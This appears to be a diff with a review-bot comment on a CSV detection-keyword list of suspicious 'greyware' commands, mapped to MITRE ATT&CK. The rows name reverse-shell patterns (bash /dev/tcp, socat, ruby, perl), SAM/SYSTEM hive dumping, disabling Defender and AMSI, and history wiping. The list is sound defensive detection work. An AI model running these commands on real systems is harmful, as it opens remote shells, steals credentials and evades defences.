Access","https://github.com/Pennyw0rth/NetExec","1","0","Checking For Hidden Credentials With Appcmd.exe","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL*","greyware_tool_keyword","reg","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active 
Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","Checking For Hidden Credentials With Appcmd.exe","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*reg query hklm\software\OpenSSH*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*reg query hklm\software\OpenSSH\Agent*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*reg query hklm\software\realvnc*","greyware_tool_keyword","reg","Query the Windows registry sensitive informations","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" 
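Review bot: The re-added `*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL*` row has `metadata_comment` set to `Checking For Hidden Credentials With Appcmd.exe`, which describes the appcmd.exe NetExec keyword in the earlier `@@ -812,20 +852,20 @@` hunk, not a registry query for RunAsPPL. It looks copied from that row, and an analyst triaging a hit on this keyword would get the wrong context. Suggest a comment such as `Checking whether LSASS runs as a protected process (RunAsPPL)`. The techniques column also looks inherited from the tool rather than the command, so consider adding `T1012`, which the neighbouring RunAsPPL row in this hunk already uses.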
@@ -984,21 +1024,21 @@
 "*reg save hklm\system system*","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","N/A","Collection","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
 "*remiflavien1/nse-install*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
 "*ren C:\Windows\System32\amsi.dll *.dll","greyware_tool_keyword","ren","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","10","8","N/A","N/A","N/A","N/A"
-"*rm .bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z"
-"*rm /home/*/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z"
-"*rm /root/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z"
-"*rm -f backpipe* mknod /tmp/backpipe p && nc *","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z"
-"*rmmod -r*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z"
-"*rmmod --remove*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z"
+"*rm .bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*rm /home/*/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*rm /root/.bash_history*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*rm -f backpipe* mknod /tmp/backpipe p && nc *","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z"
+"*rmmod -r*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*rmmod --remove*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
 "*root/SecurityCenter2* -ClassName AntiVirusProduct*","greyware_tool_keyword","powershell","list AV products with powershell","T1518.001 - T1082","TA0007 - TA0005","N/A","N/A","Discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A"
 "*RouterScan.exe*","greyware_tool_keyword","routerscan","Router Scan is able to find and identify a variety of devices from large number of known routers on your internal network","T1046 - T1083 - T1018 - T1116","TA0007 - TA0010 - TA0003","N/A","N/A","Network Exploitation tools","https://en.kali.tools/?p=244","1","1","N/A","7","10","N/A","N/A","N/A","N/A"
 "*rsync -r * *@*:*","greyware_tool_keyword","rsync","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
 "*rsync -r *@*:* *","greyware_tool_keyword","rsync","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
 "*ruby -rsocket *TCPSocket.open(*exec sprintf*/bin/sh -i *","greyware_tool_keyword","ruby","ruby reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
-"*rundll32*.dll*a*/p:*","greyware_tool_keyword","rundll32","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account.","T1055.002 - T1078.002 - T1134.001 - T1134.002","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z"
+"*rundll32*.dll*a*/p:*","greyware_tool_keyword","rundll32","Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account.","T1055.002 - T1078.002 - T1134.001 - T1134.002","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z"
 "*rundll32*.dll*StartW*","greyware_tool_keyword","rundll32","Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.","T1218.005 - T1071.001","TA0002 - TA0003","N/A","N/A","Exploitation Tools","https://github.com/MichaelKoczwara/Awesome-CobaltStrike-Defence","1","0","greyware tool - risks of False positive !","N/A","10","1224","189","2022-07-14T07:15:10Z","2021-01-01T16:44:42Z"
 "*sc config WinDefend start= disabled*","greyware_tool_keyword","shell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
-"*sc0tfree/updog*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z"
+"*sc0tfree/updog*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z"
 "*schtasks /query /v /fo LIST*","greyware_tool_keyword","schtasks","view detailed information about all the scheduled tasks.","T1053.005 - T1082","TA0004 - TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","8","10","N/A","N/A","N/A","N/A"
 "*scout aws --profile default -f*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
 "*scout azure --cli*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
@@ -1007,21 +1047,21 @@ "*screen /dev/ttyACM0 115200*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*sed 's/#PermitRootLogin prohibit-password/PermitRootLogin Yes' /etc/ssh/sshd_config*","greyware_tool_keyword","sed","allowing root login for ssh","T1078 - T1078.003 - T1021 - T1021.004","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","N/A","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*server*-relay.screenconnect.com*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","screenconnect.com","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*set history +o*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" +"*set history +o*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive 
!","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" "*Set-ItemProperty *\excel\security*pythonfunctionwarnings*0*","greyware_tool_keyword","Excel","prevent any warnings or alerts when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet","T1112 - T1131 - T1204.002","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tsale/Sigma_rules/blob/main/MISC/pythonfunctionwarnings_disabled.yml","1","0","N/A","7","1","88","10","2023-09-13T20:39:02Z","2022-01-11T07:34:37Z" "*Set-MpPreference -DisableIOAVProtection $true*","greyware_tool_keyword","powershell","Disable scanning all downloaded files and attachments","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*Set-MpPreference -DisableRealtimeMonitoring $true*","greyware_tool_keyword","powershell","Defense evasion technique In order to avoid detection at any point of the kill chain. attackers use several ways to disable anti-virus. 
disable Microsoft firewall and clear logs.","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*Set-MpPreference -DisableScriptScanning 1 *","greyware_tool_keyword","powershell","Disable AMSI (set to 0 to enable)","T1562.001 - T1562.002 - T1070.004","TA0007 - TA0040 - TA0005","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*sftp *@*:* *","greyware_tool_keyword","sftp","Detects the use of tools that copy files from or to remote systems","T1041 - T1105 - T1106","TA0002 - TA0008 - TA0010","N/A","N/A","Data Exfiltration","https://attack.mitre.org/techniques/T1105/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*sh >/dev/tcp/* <&1 2>&1*","greyware_tool_keyword","bash","Equation Group reverse shell method - simple bash reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" -"*sh -i >& /dev/udp/*/* 0>&1*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" +"*sh >/dev/tcp/* <&1 2>&1*","greyware_tool_keyword","bash","Equation Group reverse shell method - simple bash reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell 
spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" +"*sh -i >& /dev/udp/*/* 0>&1*","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" "*shadawck/nse-install*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" "*sharkd -a tcp:*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*shred --remove*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. 
Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*shred -u*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*shred -z*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. 
Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*shred --zero*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" +"*shred --remove*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. 
Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*shred -u*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*shred -z*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. 
Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*shred --zero*","greyware_tool_keyword","shred","Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.","T1070.004 - T1564.001 - T1027","TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_file_deletion_via_shred.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" "*SimpleHTTPServer.SimpleHTTPRequestHandler*","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*snmp-check * -c public*","greyware_tool_keyword","snmpcheck","automate the process of gathering information of any devices with SNMP protocol support. like snmpwalk - snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. 
It could be useful for penetration testing or systems monitoring","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","http://www.nothink.org/codes/snmpcheck/index.php","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*snmpwalk -v1 -cpublic *","greyware_tool_keyword","snmpwalk","allows you to enumerate the SNMP devices and places the output in a very human readable friendly format","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://wiki.debian.org/SNMP","1","0","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A" 
@@ -1035,23 +1075,23 @@
 "*socat -O /tmp/*","greyware_tool_keyword","socat","Shell spawning socat usage ","T1059 - T1105 - T1046","TA0002 - TA0008 - TA0007","N/A","N/A","shell spawning","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
 "*socat TCP4-LISTEN:* fork TCP4:*:*","greyware_tool_keyword","socat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Network Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
 "*socat tcp-connect*","greyware_tool_keyword","socat","Shell spawning socat usage ","T1059 - T1105 - T1046","TA0002 - TA0008 - TA0007","N/A","N/A","shell spawning","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
-"*socat tcp-connect:*:* exec:*bash -li**pty*stderr*setsid*sigint*sane*","greyware_tool_keyword","socat","socat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z"
+"*socat tcp-connect:*:* exec:*bash -li**pty*stderr*setsid*sigint*sane*","greyware_tool_keyword","socat","socat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z"
 "*socat tcp-connect:*:* exec:/bin/sh*","greyware_tool_keyword","socat","socat reverse shell","T1071 - T1573","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
 "*socat TCP-LISTEN:**reuseaddr*fork EXEC:/bin/sh*","greyware_tool_keyword","socat","socat bind shell","T1071 - T1573","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
-"*socket(S*PF_INET*SOCK_STREAM*getprotobyname(*tcp*))*if(connect(S*sockaddr_in($p*inet_aton($i))))*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","1","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z"
+"*socket(S*PF_INET*SOCK_STREAM*getprotobyname(*tcp*))*if(connect(S*sockaddr_in($p*inet_aton($i))))*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","1","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z"
 "*SOFTWARE\WOW6432Node\FreeFileSync*","greyware_tool_keyword","freefilesync","freefilesync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://freefilesync.org/download.php","1","0","N/A","9","10","N/A","N/A","N/A","N/A"
